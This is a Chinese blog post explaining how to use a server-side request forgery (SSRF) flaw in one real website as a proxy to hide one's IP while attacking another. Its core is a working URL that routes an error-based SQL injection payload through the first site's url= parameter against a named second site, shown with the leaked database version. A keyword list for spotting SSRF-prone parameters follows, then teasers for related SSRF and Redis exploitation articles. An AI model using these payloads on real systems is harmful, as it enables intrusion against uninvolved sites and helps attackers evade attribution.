利用ssrf 掩盖自己的ip地址,从而攻击其他网站

最新推荐文章于 2024-07-24 14:22:01 发布
最新推荐文章于 2024-07-24 14:22:01 发布
阅读量1.6k 收藏
点赞数 1
分类专栏: 安全 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/niexinming/article/details/49490737
版权

如果直接访问    http://www.ip.cn/ 就可以知道自己的ip地址,这样直接攻击网站就会暴露自己,但是,如果用ssrf这个漏洞,就可以用远程的服务器做代理去攻击其他网站

例子:

如果你这样访问http://qjjz.net/newsweb/news.shtml?url=http://www.ip.cn

查看源代码,你会发现你的ip变成了,

当前 IP:124.40.116.24 来自:北京市 飞华领航科技



这样你攻击一个网站比如:


http://qjjz.net/newsweb/news.shtml?url=http://www.hexie.com/main/articleDetail.php?id=757' and extractvalue(1, concat(0x5c,version())) %2523


显示出来的信息是:

MySQL Query Error:select * from knowledge where id='757' and extractvalue(1, concat(0x5c,version())) #':XPATH syntax error: '\5.5.20'


和自己直接注入是一样的



如何寻找ssrf漏洞


在对功能上存在SSRF漏洞中URL地址特征的观察,大致有以下关键字:
    

1
2
3
4
5
6
7
8
9
10
11
12
13
14
share
wap
url
link
src
source
target
u
3g
display
sourceURl
imageURL
domain
...


niexinming
关注
专栏目录
网安知识系列:SSRF漏洞中绕过IP限制的几种方法总结
weixin_54626591的博客
04-21 384
SSRF漏洞中绕过IP限制的几种方法总结
SSRF利用总结
04-24
SSRF漏洞利用总结,类似SQL注入小计的形式,总结地比较完整。
SSRF的利用方式
mingyqf的博客
11-06 7401
r3kind1e2021-03-10 03:30:32133923 SSRF的利用方式 本文对ctfhub和SSRF_Vulnerable_Lab中SSRF的利用方式进行了总结。 0x00 技能树 SSRF 常利用的相关协议 http://:探测内网主机存活、端口开放情况 gopher://:发送GET或POST请求;攻击内网应用,如FastCGI、Redis dict://:泄露安装软件版本信息,查看端口,操作内网redis访问等 file://:读取本地文件 Bypa...
CTF ssrf 基础入门 (一)
最新发布
2301_81040377的博客
07-24 722
我发现我其实并不是很明白这个东西,有些微妙,而且记忆中也就记得Gopherus这个工具了,所以重新学习了一下,顺便记录一下吧。
SSRF
jpygx123的博客
10-11 980
SSRF 服务器端伪造请求,是一种由攻击者构造形成由服务端发起请求的一个安全漏洞,一般情况下,SSRF攻击的目标是从外网无法访问的内部系统,正式因为它是由服务端发起的,所以它能够请求到与他相连而与外网隔离的内部系统。 SSRF形成的原因大都由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤和限制。比如从指定URL地址获取网页文本内容,加载指定地址的图片、下载等等。 html、ph...
Web安全 SSRF漏洞的 测试和利用.(读取服务器的任何文件)
网络安全领域___专研者.
03-04 4505
SSRF(Server-Side Request Forgery)服务端请求为伪造,SSRF是一种由攻击者构造形成由服务端发起请求的一个漏洞。(例如:攻击者操作服务端从指定URL地址获取网页文本内容,加载指定地址的图片等,利用的是服务端的请求伪造)SSRF利用存在缺陷的Web应用作为代理攻击远程和本地的服务器.
浅析Redis中SSRF的利用
weixin_45631666的博客
06-07 382
内容承接gkctf的web3。 记得之前还看过ssrf的视频结果因为看不懂就给跳过去了,????。果然出来混迟早都是要还的。 基础部分 gopher协议: Gopher是Internet上一个非常有名的信息查找系统,它将Internet上的文件组织成某种索引,很方便地将用户从Internet的一处带到另一处。在WWW出现之前,Gopher是Internet上最主要的信息检索工具,Gopher站点也是最主要的站点,使用tcp70端口。但在WWW出现后,Gopher失去了昔日的辉煌。现在它基本过时,人们很少再
ssrf-req-filter:在 NodeJS 中发送请求时防止 SSRF 的模块。 阻止对本地和私有 IP 地址的请求
05-31
ssrf-req-filter - 防止 SSRF 攻击 :shield: 服务器端请求伪造 (SSRF) SSRF 是一种攻击媒介,它滥用应用程序与内部/外部网络或机器本身进行交互。 此向量的促成因素之一是 URL 处理不当。 安装 npm install ssrf-...
你未见过的SSRF利用方式
06-20
Side Request Forgery:服务器端请求伪造) 是⼀种由攻击者构造形成,由服务端发起请求的⼀个安全漏洞 原因是由于服务端提供了从其他服务器应⽤获取数据的功能且没有对地址和协议等做过滤和限制 本⽂讲解⼀个ssrf的...
如何利用ssrf 进行mysql攻击
05-23
SSRF(Server-Side Request Forgery)是一种攻击技术,利用它可以让攻击者在目标服务器上执行任意请求,包括访问本地服务和第三方服务。下面介绍一种利用SSRF进行MySQL攻击的方法。 1. 找到一个存在SSRF漏洞的网站...
浅谈SSRF原理及其利用
技术超强的网络安全平台
11-26 584
声明:本文仅用作技术交流学习分享用途,严禁将本文中涉及到的技术用法用于违法犯罪目的。0x00 漏洞说明SSRF (Server-Side Request Forgery) 即服务端请求伪造,从字面意思上理解就是伪造一个服务端请求,也即是说攻击者伪造服务端的请求发起攻击攻击者借由服务端为跳板来攻击目标系统。既然是跳板,也就是表明攻击者是无法直接访问目标服务的,为了更好的理解这个过程,我从网上找了一张图,贴在了下面。0x01 漏洞影响上面简单介绍了一下SSRF的原理,那么SSRF能干什么,产生哪些危害呢?利用
SSRF中Redis的利用
2301_80127209的博客
01-23 1424
SSRF(Server-Side Request Forgery,服务器请求伪造)是一种由攻击者构造请求,由服务端发起请求的安全漏洞,一般情况下,SSRF攻击的目标是外网无法访问的内网系统(因为请求是由服务端帮我们发起的,所以我们可以通过它来向其所在的内网机器发起请求)。Gopherus下载地址自己手动把攻击语句转换成Gopher协议的格式会很麻烦,这款工具里面内置了一些早就写好的利用语句,我们只需要学会如何使用它就可以很方便的写出一些我们需要的利用语句。
浅析SSRF的各种利用方式
m0_64583632的博客
11-10 761
浅析SSRF的各种利用方式和绕过
SSRF漏洞利用框架
cnbird's blog
09-16 2847
https://github.com/jayeshchauhan/SKANDA
SSRF漏洞内网渗透利用(实例)
墨痕诉清风的博客
10-07 6329
目录 常出现的位置 绕过方式 正则过滤指定网址 内网IP地址绕过(不容许172、10、192开头的地址均不许输入) 常见的攻击协议 实例:ssrf漏洞利用(内网探测、打redis) 一、进行内网探测 二、file协议读取文件 三、攻击redis 方法一:通过header CRLF 注入 方法二:通过【curl命令】和【gopher协议】远程攻击内网redis 方法三:使用dict协议向Redis数据库写shell Payload 完善修改 四、结合gopher协...
SSFR概念及简单使用(超详讲)
weixin_59047731的博客
11-27 851
SSRF漏洞就是通过篡改获取资源的请求发送给服务器但是服务器并没有检测这个请求是否合法的然后服务器以他的身份来访问其他服务器的资源。
Redis渗透&SSRF的利用-看这一篇就够了
cike_y
02-05 1621
关于redis的渗透利用,及SSRF的方式
SSRF漏洞深入利用与防御方案绕过技巧
道阻且长,行则将至。
07-11 1116
本文借助 CTFHub 与 portswigger 两个 SSRF 靶场,实践练习了 SSRF 漏洞的基础利用(内网访问、文件读取、端口探测)和进阶利用(Gopher 协议发送 post 请求、攻击 Redis 实现 RCE 等),最后实践了常见的防御方案绕过手段(黑白名单绕过、重定向、DNS 绑定等)。
【web安全SSRF的各种利用方式
HBohan的博客
04-19 1868
什么是SSRF SSRF(服务端请求伪造漏洞) 由于服务端提供了从其他服务器应用获取数据的功能,但又没有对目标地址做严格过滤与限制,导致攻击者可以传入任意的地址来让后端服务器对其发起请求,并返回对该目标地址请求的数据。 一般情况下,SSRF针对的都是一些外网无法访问的内网,所以需要SSRF使目标后端去访问内网,进而达到我们攻击内网的目的。 通过SSRF,我们可以访问目标内网的redis服务,mysql服务,smpt服务,fastcgi服务等 造成漏洞的一些函数 file_get_contents():将整
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值